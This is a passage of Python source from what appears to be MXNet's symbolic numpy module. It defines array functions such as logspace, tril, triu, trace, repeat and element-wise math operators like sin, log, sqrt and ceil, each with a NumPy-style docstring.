In that case, ``num + 1`` values are spaced over the interval in log-space, of which all but the last (a sequence of length `num`) are returned. num : scalar, optional Number of samples to generate. Default is 50. endpoint : boolean, optional If true, `stop` is the last sample. Otherwise, it is not included. Default is True. base : scalar, optional The base of the log space. The step size between the elements in ``ln(samples) / ln(base)`` (or ``log_base(samples)``) is uniform. Default is 10.0. dtype : dtype The type of the output array. If `dtype` is not given, infer the data type from the other input arguments. axis : scalar, optional The axis in the result to store the samples. Relevant only if start or stop are array-like. By default (0), the samples will be along a new axis inserted at the beginning. Now, axis only support axis = 0. ctx : Context, optional An optional device context (default is the current default context). Returns ------- samples : _Symbol `num` samples, equally spaced on a log scale. See Also -------- arange : Similar to linspace, with the step size specified instead of the number of samples. Note that, when used with a float endpoint, the endpoint may or may not be included. linspace : Similar to logspace, but with the samples uniformly distributed in linear space, instead of log space. Notes ----- Logspace is equivalent to the code >>> y = np.linspace(start, stop, num=num, endpoint=endpoint) ... >>> power(base, y).astype(dtype) ... Examples -------- >>> np.logspace(2.0, 3.0, num=4) array([ 100. , 215.44347, 464.15887, 1000. ]) >>> np.logspace(2.0, 3.0, num=4, endpoint=False) array([100. , 177.82794, 316.22775, 562.3413 ]) >>> np.logspace(2.0, 3.0, num=4, base=2.0) array([4. , 5.0396843, 6.349604 , 8. ]) >>> np.logspace(2.0, 3.0, num=4, base=2.0, dtype=np.int32) array([4, 5, 6, 8], dtype=int32) >>> np.logspace(2.0, 3.0, num=4, ctx=npx.gpu(0)) array([ 100. , 215.44347, 464.15887, 1000. 
], ctx=gpu(0))
    """
    # start/stop must be scalars; array-like endpoints are not implemented.
    if isinstance(start, (list, _np.ndarray)) or \
            isinstance(stop, (list, _np.ndarray)):
        raise NotImplementedError('start and stop only support int')
    if axis != 0:
        raise NotImplementedError("the function only support axis 0")
    if ctx is None:
        ctx = current_context()
    return _npi.logspace(start=start, stop=stop, num=num, endpoint=endpoint, base=base, ctx=ctx, dtype=dtype)


@set_module('mxnet.symbol.numpy')
def expand_dims(a, axis):
    """Expand the shape of an array.

    Insert a new axis that will appear at the `axis` position in the expanded
    array shape.

    Parameters
    ----------
    a : _Symbol
        Input array.
    axis : int
        Position in the expanded axes where the new axis is placed.

    Returns
    -------
    res : _Symbol
        Output array. The number of dimensions is one greater than that of
        the input array.
    """
    return _npi.expand_dims(a, axis)


@set_module('mxnet.symbol.numpy')
def tril(m, k=0):
    r"""
    Lower triangle of an array.

    Return a copy of an array with elements above the `k`-th diagonal zeroed.

    Parameters
    ----------
    m : _Symbol, shape (M, N)
        Input array.
    k : int, optional
        Diagonal above which to zero elements. `k = 0` (the default) is the
        main diagonal, `k < 0` is below it and `k > 0` is above.

    Returns
    -------
    tril : _Symbol, shape (M, N)
        Lower triangle of `m`, of same shape and data-type as `m`.

    See Also
    --------
    triu : same thing, only for the upper triangle
    """
    return _npi.tril(m, k)


@set_module('mxnet.symbol.numpy')
def triu(m, k=0):
    r"""
    Upper triangle of an array.

    Return a copy of an array with elements under the `k`-th diagonal zeroed.

    Parameters
    ----------
    m : _Symbol, shape (M, N)
        Input array.
    k : int, optional
        Diagonal under which to zero elements. `k = 0` (the default) is the
        main diagonal, `k < 0` is below it and `k > 0` is under.

    Returns
    -------
    triu : _Symbol, shape (M, N)
        Upper triangle of `m`, of same shape and data-type as `m`.
See Also -------- tril : same thing, only for the lower triangle """ return _npi.triu(m, k) def tril_indices(n, k=0, m=None): """ Return the indices for the lower-triangle of an (n, m) array. Parameters ---------- n : int The row dimension of the arrays for which the returned indices will be valid. k : int, optional Diagonal offset (see `tril` for details). m : int, optional .. versionadded:: 1.9.0 The column dimension of the arrays for which the returned arrays will be valid. By default `m` is taken equal to `n`. Returns ------- inds : tuple of _Symbol The indices for the triangle. The returned tuple contains two arrays, each with the indices along one dimension of the array. See also -------- triu_indices : similar function, for upper-triangular. mask_indices : generic function accepting an arbitrary mask function. tril, triu Notes ----- .. versionadded:: 1.4.0 Examples -------- Compute two different sets of indices to access 4x4 arrays, one for the lower triangular part starting at the main diagonal, and one starting two diagonals further right: >>> il1 = np.tril_indices(4) >>> il2 = np.tril_indices(4, 2) Here is how they can be used with a sample array: >>> a = np.arange(16).reshape(4, 4) >>> a array([[ 0, 1, 2, 3], [ 4, 5, 6, 7], [ 8, 9, 10, 11], [12, 13, 14, 15]]) Both for indexing: >>> a[il1] array([ 0, 4, 5, 8, 9, 10, 12, 13, 14, 15]) And for assigning values: >>> a[il1] = -1 >>> a array([[-1, 1, 2, 3], [-1, -1, 6, 7], [-1, -1, -1, 11], [-1, -1, -1, -1]]) These cover almost the whole array (two diagonals right of the main one): >>> a[il2] = -10 >>> a array([[-10, -10, -10, 3], [-10, -10, -10, -10], [-10, -10, -10, -10], [-10, -10, -10, -10]]) """ if m is None: m = n return _npi.tril_indices(n, k, m) @set_module('mxnet.symbol.numpy') def trace(a, offset=0, axis1=0, axis2=1, out=None): """ Return the sum along diagonals of the array. 
If `a` is 2-D, the sum along its diagonal with the given offset is returned, i.e., the sum of elements ``a[i,i+offset]`` for all i. If `a` has more than two dimensions, then the axes specified by axis1 and axis2 are used to determine the 2-D sub-arrays whose traces are returned. The shape of the resulting array is the same as that of `a` with `axis1` and `axis2` removed. Parameters ---------- a : _Symbol Input array, from which the diagonals are taken. offset : int, optional Offset of the diagonal from the main diagonal. Can be both positive and negative. Defaults to 0. axis1, axis2 : int, optional Axes to be used as the first and second axis of the 2-D sub-arrays from which the diagonals should be taken. Defaults are the first two axes of `a`. out : _Symbol Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- sum_along_diagonals : _Symbol If `a` is 2-D, the sum along the diagonal is returned. If `a` has larger dimensions, then an array of sums along diagonals is returned. """ return _npi.trace(a, offset=offset, axis1=axis1, axis2=axis2, out=out) @set_module('mxnet.symbol.numpy') def transpose(a, axes=None): """ Permute the dimensions of an array. Parameters ---------- a : _Symbol Input array. axes : list of ints, optional By default, reverse the dimensions, otherwise permute the axes according to the values given. Returns ------- p : _Symbol a with its axes permuted. """ return _npi.transpose(a, axes=axes) @set_module('mxnet.symbol.numpy') def tri(N, M=None, k=0, dtype=None, ctx=None): r""" An array with ones at and below the given diagonal and zeros elsewhere. Parameters ---------- N : int Number of rows in the array. M : int, optional Number of columns in the array. By default, `M` is taken equal to `N`. k : int, optional The sub-diagonal at and below which the array is filled. `k` = 0 is the main diagonal, while `k` < 0 is below it, and `k` > 0 is above. The default is 0. dtype : dtype, optional Data type of the returned array. 
The default is float. Returns ------- tri : Symbol of shape (N, M) Array with its lower triangle filled with ones and zero elsewhere; in other words ``T[i,j] == 1`` for ``i <= j + k``, 0 otherwise. """ if dtype is None: dtype = 'float32' if M is None: M = N if ctx is None: ctx = current_context() return _npi.tri(N, M, k, dtype, ctx) def repeat(a, repeats, axis=None): """ Repeat elements of an array. Parameters ---------- a : array_like Input array. repeats : int The number of repetitions for each element. axis : int, optional The axis along which to repeat values. By default, use the flattened input array, and return a flat output array. Returns ------- repeated_array : ndarray Output array which has the same shape as `a`, except along the given axis. See Also -------- tile : Tile an array. Examples -------- >>> np.repeat(3, 4) array([3, 3, 3, 3]) >>> x = np.array([[1,2],[3,4]]) >>> np.repeat(x, 2) array([1, 1, 2, 2, 3, 3, 4, 4]) >>> np.repeat(x, 3, axis=1) array([[1, 1, 1, 2, 2, 2], [3, 3, 3, 4, 4, 4]]) >>> np.repeat(x, [1, 2], axis=0) array([[1, 2], [3, 4], [3, 4]]) """ if isinstance(repeats, numeric_types): repeats = [repeats] if axis is not None: tmp = swapaxes(a, 0, axis) res = _npi.repeats(tmp, repeats=repeats, axis=0) return swapaxes(res, 0, axis) return _npi.repeats(a, repeats=repeats, axis=axis) def _unary_func_helper(x, fn_array, fn_scalar, out=None, **kwargs): """Helper function for unary operators. Parameters ---------- x : _Symbol or scalar Input of the unary operator. fn_array : function Function to be called if x is of ``_Symbol`` type. fn_scalar : function Function to be called if x is a Python scalar. out : _Symbol Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- out : _Symbol or scalar Result _Symbol or scalar. 
""" if isinstance(x, numeric_types): return fn_scalar(x, **kwargs) elif isinstance(x, _Symbol): return fn_array(x, out=out, **kwargs) else: raise TypeError('type {} not supported'.format(str(type(x)))) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def sin(x, out=None, **kwargs): r""" Trigonometric sine, element-wise. Parameters ---------- x : _Symbol or scalar Angle, in radians (:math:`2 \pi` rad equals 360 degrees). out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol The sine of each element of x. This is a scalar if `x` is a scalar. Notes ---- This function only supports input type of float. """ return _unary_func_helper(x, _npi.sin, _np.sin, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def cos(x, out=None, **kwargs): r""" Cosine, element-wise. Parameters ---------- x : _Symbol or scalar Angle, in radians (:math:`2 \pi` rad equals 360 degrees). out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol The corresponding cosine values. This is a scalar if x is a scalar. Notes ---- This function only supports input type of float. """ return _unary_func_helper(x, _npi.cos, _np.cos, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def sinh(x, out=None, **kwargs): """ Hyperbolic sine, element-wise. Equivalent to ``1/2 * (np.exp(x) - np.exp(-x))`` or ``-1j * np.sin(1j*x)``. Parameters ---------- x : _Symbol or scalar Input array or scalar. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol or scalar The corresponding hyperbolic sine values. This is a scalar if `x` is a scalar. Notes ---- This function only supports input type of float. 
""" return _unary_func_helper(x, _npi.sinh, _np.sinh, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def cosh(x, out=None, **kwargs): """ Hyperbolic cosine, element-wise. Equivalent to ``1/2 * (np.exp(x) + np.exp(-x))`` and ``np.cos(1j*x)``. Parameters ---------- x : _Symbol or scalar Input array or scalar. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol or scalar The corresponding hyperbolic cosine values. This is a scalar if `x` is a scalar. Notes ---- This function only supports input type of float. """ return _unary_func_helper(x, _npi.cosh, _np.cosh, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def tanh(x, out=None, **kwargs): """ Compute hyperbolic tangent element-wise. Equivalent to ``np.sinh(x)/np.cosh(x)``. Parameters ---------- x : _Symbol Input array. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol The corresponding hyperbolic tangent values. Notes ----- If `out` is provided, the function writes the result into it, and returns a reference to `out`. (See Examples) - input x does not support complex computation (like imaginary number) >>> np.tanh(np.pi*1j) TypeError: type <type 'complex'> not supported Examples -------- >>> np.tanh(np.array[0, np.pi])) array([0. 
, 0.9962721]) >>> np.tanh(np.pi) 0.99627207622075 >>> # Example of providing the optional output parameter illustrating >>> # that what is returned is a reference to said parameter >>> out1 = np.array(1) >>> out2 = np.tanh(np.array(0.1), out1) >>> out2 is out1 True >>> # Example of ValueError due to provision of shape mis-matched `out` >>> np.tanh(np.zeros((3,3)),np.zeros((2,2))) mxnet.base.MXNetError: [07:17:36] ../src/ndarray/./../operator/tensor/../elemwise_op_common.h:135: Check failed: assign(&dattr, vec.at(i)): Incompatible attr in node at 0-th output: expected [3,3], got [2,2] """ return _unary_func_helper(x, _npi.tanh, _np.tanh, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def log10(x, out=None, **kwargs): """ Return the base 10 logarithm of the input array, element-wise. Parameters ---------- x : _Symbol or scalar Input array or scalar. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol or scalar The logarithm to the base 10 of `x`, element-wise. NaNs are returned where x is negative. This is a scalar if `x` is a scalar. Notes ---- This function only supports input type of float. """ return _unary_func_helper(x, _npi.log10, _np.log10, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def sqrt(x, out=None, **kwargs): """ Return the non-negative square-root of an array, element-wise. Parameters ---------- x : _Symbol or scalar The values whose square-roots are required. out : _Symbol, or None, optional Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol or scalar An array of the same shape as `x`, containing the positive square-root of each element in `x`. This is a scalar if `x` is a scalar. Notes ---- This function only supports input type of float. 
""" return _unary_func_helper(x, _npi.sqrt, _np.sqrt, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def cbrt(x, out=None, **kwargs): r""" Return the cube-root of an array, element-wise. Parameters ---------- x : _Symbol The values whose cube-roots are required. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ---------- y : _Symbol An array of the same shape as x, containing the cube cube-root of each element in x. If out was provided, y is a reference to it. This is a scalar if x is a scalar. """ return _unary_func_helper(x, _npi.cbrt, _np.cbrt, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def abs(x, out=None, **kwargs): r""" Calculate the absolute value element-wise. Parameters ---------- x : _Symbol or scalar Input array. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- absolute : _Symbol An ndarray containing the absolute value of each element in `x`. This is a scalar if `x` is a scalar. """ return _unary_func_helper(x, _npi.abs, _np.abs, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def fabs(x, out=None, **kwargs): r""" Calculate the absolute value element-wise. This function returns the absolute values (positive magnitude) of the data in `x`. Complex values are not handled, use `absolute` to find the absolute values of complex data. Parameters ---------- x : _Symbol or scalar Input array. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- absolute : _Symbol An ndarray containing the absolute value of each element in `x`. This is a scalar if `x` is a scalar. """ return _unary_func_helper(x, _npi.abs, _np.abs, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def absolute(x, out=None, **kwargs): r""" Calculate the absolute value element-wise. np.abs is a shorthand for this function. 
    Parameters
    ----------
    x : _Symbol
        Input array.
    out : _Symbol or None
        Dummy parameter to keep the consistency with the ndarray counterpart.

    Returns
    -------
    absolute : _Symbol
        An ndarray containing the absolute value of each element in x.
    """
    return _unary_func_helper(x, _npi.absolute, _np.absolute, out=out, **kwargs)


@set_module('mxnet.symbol.numpy')
@wrap_np_unary_func
def sign(x, out=None, **kwargs):
    r"""
    Returns an element-wise indication of the sign of a number.
    The `sign` function returns ``-1 if x < 0, 0 if x==0, 1 if x > 0``.
    Only supports real number.

    Parameters
    ----------
    x : _Symbol or a scalar
        Input values.
    out : _Symbol or None, optional
        Dummy parameter to keep the consistency with the ndarray counterpart.

    Returns
    -------
    y : _Symbol
        The sign of `x`.
        This is a scalar if `x` is a scalar.

    Note
    ----
    - Only supports real number as input elements.
    - Input type does not support Python native iterables(list, tuple, ...)
    - ``out`` param: cannot perform auto broadcasting. ``out`` symbol's shape must be
    the same as the expected output.
    - ``out`` param: cannot perform auto type cast. ``out`` symbol's dtype must be
    the same as the expected output.
    - ``out`` param does not support scalar input case.
    """
    return _unary_func_helper(x, _npi.sign, _np.sign, out=out, **kwargs)


@set_module('mxnet.symbol.numpy')
@wrap_np_unary_func
def exp(x, out=None, **kwargs):
    r"""
    Calculate the exponential of all elements in the input array.

    Parameters
    ----------
    x : _Symbol or scalar
        Input values.
    out : _Symbol or None
        Dummy parameter to keep the consistency with the ndarray counterpart.

    Returns
    -------
    out : _Symbol
        Output array, element-wise exponential of `x`.
        This is a scalar if `x` is a scalar.
    """
    return _unary_func_helper(x, _npi.exp, _np.exp, out=out, **kwargs)


@set_module('mxnet.symbol.numpy')
@wrap_np_unary_func
def expm1(x, out=None, **kwargs):
    r"""
    Calculate `exp(x) - 1` for all elements in the array.

    Parameters
    ----------
    x : _Symbol or scalar
        Input values.
    out : _Symbol or None
        Dummy parameter to keep the consistency with the ndarray counterpart.

    Returns
    -------
    out : _Symbol
        Output array, element-wise `exp(x) - 1`.
        This is a scalar if `x` is a scalar.
    """
    return _unary_func_helper(x, _npi.expm1, _np.expm1, out=out, **kwargs)


@set_module('mxnet.symbol.numpy')
@wrap_np_unary_func
def arcsin(x, out=None, **kwargs):
    r"""
    Inverse sine, element-wise.

    Parameters
    ----------
    x : _Symbol or scalar
        The values whose reciprocals are required.
    out : _Symbol, or None, optional
        Dummy parameter to keep the consistency with the ndarray counterpart.

    Returns
    -------
    angle : _Symbol or scalar
        Output array is same shape and type as x. This is a scalar if x is a scalar.

    Notes
    -----
    `arcsin` is a multivalued function: for each `x` there are infinitely
    many numbers `z` such that :math:`sin(z) = x`. The convention is to
    return the angle `z` whose real part lies in [-pi/2, pi/2].
    For real-valued input data types, *arcsin* always returns real output.
    For each value that cannot be expressed as a real number or infinity,
    it yields ``nan`` and sets the `invalid` floating point error flag.
    The inverse sine is also known as `asin` or sin^{-1}.
    The output `symbol` has the same `ctx` as the input `symbol`.
    This function differs from the original `numpy.arcsin
    <https://docs.scipy.org/doc/numpy/reference/generated/numpy.arcsin.html>`_ in
    the following aspects:
    - Only support _Symbol or scalar now.
    - `where` argument is not supported.
    - Complex input is not supported.

    References
    ----------
    Abramowitz, M. and Stegun, I. A., *Handbook of Mathematical Functions*,
    10th printing, New York: Dover, 1964, pp. 79ff.
    http://www.math.sfu.ca/~cbm/aands/
    """
    return _unary_func_helper(x, _npi.arcsin, _np.arcsin, out=out, **kwargs)


@set_module('mxnet.symbol.numpy')
@wrap_np_unary_func
def arccos(x, out=None, **kwargs):
    r"""
    Trigonometric inverse cosine, element-wise.
    The inverse of cos so that, if y = cos(x), then x = arccos(y).

    Parameters
    ----------
    x : _Symbol
        x-coordinate on the unit circle. For real arguments, the domain is [-1, 1].
    out : _Symbol or None
        Dummy parameter to keep the consistency with the ndarray counterpart.

    Returns
    -------
    angle : _Symbol
        The angle of the ray intersecting the unit circle at the given x-coordinate
        in radians [0, pi]. This is a scalar if x is a scalar.

    See also
    --------
    cos, arctan, arcsin

    Notes
    -----
    arccos is a multivalued function: for each x there are infinitely many numbers z
    such that cos(z) = x. The convention is to return the angle z whose real part lies
    in [0, pi].
    For real-valued input data types, arccos always returns real output.
    For each value that cannot be expressed as a real number or infinity, it yields nan
    and sets the invalid floating point error flag.
    The inverse cos is also known as acos or cos^-1.
    """
    return _unary_func_helper(x, _npi.arccos, _np.arccos, out=out, **kwargs)


@set_module('mxnet.symbol.numpy')
@wrap_np_unary_func
def arctan(x, out=None, **kwargs):
    r"""
    Trigonometric inverse tangent, element-wise.
    The inverse of tan, so that if ``y = tan(x)`` then ``x = arctan(y)``.

    Parameters
    ----------
    x : _Symbol or scalar
        Input values.
    out : _Symbol or None
        Dummy parameter to keep the consistency with the ndarray counterpart.

    Returns
    -------
    out : _Symbol
        Out has the same shape as `x`. It lies is in
        ``[-pi/2, pi/2]`` (``arctan(+/-inf)`` returns ``+/-pi/2``).
        This is a scalar if `x` is a scalar.

    Notes
    -----
    `arctan` is a multi-valued function: for each `x` there are infinitely
    many numbers `z` such that tan(`z`) = `x`.  The convention is to return
    the angle `z` whose real part lies in [-pi/2, pi/2].
    For real-valued input data types, `arctan` always returns real output.
    For each value that cannot be expressed as a real number or infinity,
    it yields ``nan`` and sets the `invalid` floating point error flag.
    For complex-valued input, we do not have support for them yet.
    The inverse tangent is also known as `atan` or tan^{-1}.
""" return _unary_func_helper(x, _npi.arctan, _np.arctan, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def log(x, out=None, **kwargs): """ Natural logarithm, element-wise. The natural logarithm `log` is the inverse of the exponential function, so that `log(exp(x)) = x`. The natural logarithm is logarithm in base `e`. Parameters ---------- x : _Symbol Input value. Elements must be of real value. out : _Symbol or None, optional Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol The natural logarithm of `x`, element-wise. This is a scalar if `x` is a scalar. Notes ----- Currently only supports data of real values and ``inf`` as input. Returns data of real value, ``inf``, ``-inf`` and ``nan`` according to the input. This function differs from the original `numpy.log <https://docs.scipy.org/doc/numpy/reference/generated/numpy.log.html>`_ in the following aspects: - Does not support complex number for now - Input type does not support Python native iterables(list, tuple, ...). Only ndarray is supported. - ``out`` param: cannot perform auto braodcasting. ``out`` symbol's shape must be the same as the expected output. - ``out`` param: cannot perform auto type cast. ``out`` symbol's dtype must be the same as the expected output. - ``out`` param does not support scalar input case. """ return _unary_func_helper(x, _npi.log, _np.log, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def degrees(x, out=None, **kwargs): """ Convert angles from radians to degrees. Parameters ---------- x : _Symbol Input value. Elements must be of real value. out : _Symbol or None, optional Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol of floats The corresponding degree values; if `out` was supplied this is a reference to it. This is a scalar if `x` is a scalar. 
Notes ------- This function differs from the original `numpy.degrees <https://docs.scipy.org/doc/numpy/reference/generated/numpy.degrees.html>`_ in the following aspects: - Input type does not support Python native iterables(list, tuple, ...). Only ndarray is supported. - ``out`` param: cannot perform auto broadcasting. ``out`` symbol's shape must be the same as the expected output. - ``out`` param: cannot perform auto type cast. ``out`` symbol's dtype must be the same as the expected output. - ``out`` param does not support scalar input case. """ return _unary_func_helper(x, _npi.degrees, _np.degrees, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def rad2deg(x, out=None, **kwargs): r""" Convert angles from radians to degrees. Parameters ---------- x : _Symbol or scalar Angles in degrees. out : _Symbol or None, optional A location into which the result is stored. Returns ------- y : _Symbol or scalar The corresponding angle in radians. This is a scalar if `x` is a scalar. Notes ----- "rad2deg(x)" is "x * 180 / pi". This function differs from the original numpy.arange in the following aspects: - Only support float32 and float64. - `out` must be in the same size of input. """ return _unary_func_helper(x, _npi.rad2deg, _np.rad2deg, out=out) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def rint(x, out=None, **kwargs): """ Round elements of the array to the nearest integer. Parameters ---------- x : _Symbol or scalar Input array. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- out : _Symbol or scalar Output array is same shape and type as x. This is a scalar if x is a scalar. 
Notes ----- This function differs from the original `numpy.rint <https://docs.scipy.org/doc/numpy/reference/generated/numpy.rint.html>`_ in the following way(s): - only _Symbol or scalar is accpted as valid input, tuple of _Symbol is not supported - broadcasting to `out` of different shape is currently not supported - when input is plain python numerics, the result will not be stored in the `out` param """ return _unary_func_helper(x, _npi.rint, _np.rint, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def log2(x, out=None, **kwargs): """ Base-2 logarithm of x. Parameters ---------- x : _Symbol Input values. out : _Symbol or None A location into which the result is stored. If provided, it must have the same shape and type as the input. If not provided or None, a freshly-allocated array is returned. Returns ------- y : _Symbol The logarithm base two of `x`, element-wise. This is a scalar if `x` is a scalar. Notes ----- This function differs from the original `numpy.log2 <https://www.google.com/search?q=numpy+log2>`_ in the following way(s): - only ndarray or scalar is accpted as valid input, tuple of ndarray is not supported - broadcasting to `out` of different shape is currently not supported - when input is plain python numerics, the result will not be stored in the `out` param """ return _unary_func_helper(x, _npi.log2, _np.log2, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def log1p(x, out=None, **kwargs): """ Return the natural logarithm of one plus the input array, element-wise. Calculates ``log(1 + x)``. Parameters ---------- x : _Symbol or scalar Input array. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol or scalar Natural logarithm of 1 + x, element-wise. This is a scalar if x is a scalar. Notes ----- For real-valued input, `log1p` is accurate also for `x` so small that `1 + x == 1` in floating-point accuracy. 
Logarithm is a multivalued function: for each `x` there is an infinite number of `z` such that `exp(z) = 1 + x`. The convention is to return the `z` whose imaginary part lies in `[-pi, pi]`. For real-valued input data types, `log1p` always returns real output. For each value that cannot be expressed as a real number or infinity, it yields ``nan`` and sets the `invalid` floating point error flag. cannot support complex-valued input. Examples -------- >>> np.log1p(1e-99) 1e-99 >>> a = np.array([3, 4, 5]) >>> np.log1p(a) array([1.3862944, 1.609438 , 1.7917595]) """ return _unary_func_helper(x, _npi.log1p, _np.log1p, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def radians(x, out=None, **kwargs): """ Convert angles from degrees to radians. Parameters ---------- x : _Symbol or scalar Input array in degrees. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol The corresponding radian values. This is a scalar if x is a scalar. Notes ----- This function differs from the original `numpy.radians <https://docs.scipy.org/doc/numpy/reference/generated/numpy.radians.html>`_ in the following way(s): - only _Symbol or scalar is accpted as valid input, tuple of _Symbol is not supported - broadcasting to `out` of different shape is currently not supported - when input is plain python numerics, the result will not be stored in the `out` param Examples -------- >>> deg = np.arange(12.) * 30. >>> np.radians(deg) array([0. , 0.5235988, 1.0471976, 1.5707964, 2.0943952, 2.6179938, 3.1415927, 3.6651914, 4.1887903, 4.712389 , 5.2359877, 5.7595863], dtype=float32) """ return _unary_func_helper(x, _npi.radians, _np.radians, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def deg2rad(x, out=None, **kwargs): r""" deg2rad(x, out=None) Convert angles from degrees to radians. Parameters ---------- x : _Symbol or scalar Angles in degrees. 
out : _Symbol or None, optional A location into which the result is stored. Returns ------- y : _Symbol or scalar The corresponding angle in radians. This is a scalar if `x` is a scalar. Notes ----- "deg2rad(x)" is "x * pi / 180". This function differs from the original numpy.arange in the following aspects: - Only support float32 and float64. - `out` must be in the same size of input. """ return _unary_func_helper(x, _npi.deg2rad, _np.deg2rad, out=out) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def reciprocal(x, out=None, **kwargs): r""" Return the reciprocal of the argument, element-wise. Calculates ``1/x``. Parameters ---------- x : _Symbol or scalar The values whose reciprocals are required. out : _Symbol, or None, optional Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol or scalar Output array is same shape and type as x. This is a scalar if x is a scalar. Notes ----- .. note:: This function is not designed to work with integers. For integer arguments with absolute value larger than 1 the result is always zero because of the way Python handles integer division. For integer zero the result is an overflow. The output `symbol` has the same `ctx` as the input `symbol`. This function differs from the original `numpy.reciprocal <https://docs.scipy.org/doc/numpy/reference/generated/numpy.reciprocal.html>`_ in the following aspects: - Only support _Symbol and scalar now. - `where` argument is not supported. """ return _unary_func_helper(x, _npi.reciprocal, _np.reciprocal, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def square(x, out=None, **kwargs): r""" Return the element-wise square of the input. Parameters ---------- x : _Symbol or scalar The values whose reciprocals are required. out : _Symbol, or None, optional Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol or scalar Output array is same shape and type as x. 
This is a scalar if x is a scalar. Notes ----- The output `symbol` has the same `ctx` as the input `symbol`. This function differs from the original `numpy.square <https://docs.scipy.org/doc/numpy/reference/generated/numpy.square.html>`_ in the following aspects: - Only support _Symbol and scalar now. - `where` argument is not supported. """ return _unary_func_helper(x, _npi.square, _np.square, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def negative(x, out=None, **kwargs): r""" Numerical negative, element-wise. Parameters: ------------ x : _Symbol or scalar Input array. out : _Symbol or None, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or None, a freshly-allocated array is returned. A tuple (possible only as a keyword argument) must have length equal to the number of outputs. Returns: ------- y : _Symbol or scalar Returned array or scalar: y = -x. This is a scalar if x is a scalar. Examples: --------- >>> np.negative(1) -1 """ return _unary_func_helper(x, _npi.negative, _np.negative, out=out) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def fix(x, out=None, **kwargs): """ Round to nearest integer towards zero. Round an array of floats element-wise to nearest integer towards zero. The rounded values are returned as floats. Parameters: ---------- x : _Symbol or scalar An array of floats to be rounded out : _Symbol or scalar, optional Output array Returns: --------- y : _Symbol or scalar Examples: ---------- >>> np.fix(3.14) 3 """ return _unary_func_helper(x, _npi.fix, _np.fix, out=out) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def tan(x, out=None, **kwargs): r""" Compute tangent element-wise. Equivalent to np.sin(x)/np.cos(x) element-wise. Parameters: ---------- x : _Symbol or scalar Input array. out : _Symbol or scalar or None. A location into which the result is stored. 
If provided, it must have a shape that the inputs broadcast to. If not provided or None, a freshly-allocated array is returned. A tuple (possible only as a keyword argument) must have length equal to the number of outputs. Returns: ------- y : _Symbol or scalar The corresponding tangent values. This is a scalar if x is a scalar. """ return _unary_func_helper(x, _npi.tan, _np.tan, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def ceil(x, out=None, **kwargs): r""" Return the ceiling of the input, element-wise. The ceil of the ndarray `x` is the smallest integer `i`, such that `i >= x`. It is often denoted as :math:`\lceil x \rceil`. Parameters ---------- x : _Symbol or scalar Input array. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol or scalar The ceiling of each element in `x`, with `float` dtype. This is a scalar if `x` is a scalar. Examples -------- >>> a = np.array([-1.7, -1.5, -0.2, 0.2, 1.5, 1.7, 2.0]) >>> np.ceil(a) array([-1., -1., -0., 1., 2., 2., 2.]) >>> #if you use parameter out, x and out must be ndarray. if not, you will get an error! >>> a = np.array(1) >>> np.ceil(np.array(3.5), a) array(4.) >>> a array(4.) """ return _unary_func_helper(x, _npi.ceil, _np.ceil, out=out, **kwargs) @set_module('mxnet.symbol.numpy') def insert(arr, obj, values, axis=None): """ Insert values along the given axis before the given indices. Parameters ---------- arr : _Symbol Input array. obj : int, slice or ndarray of int64 Object that defines the index or indices before which `values` is 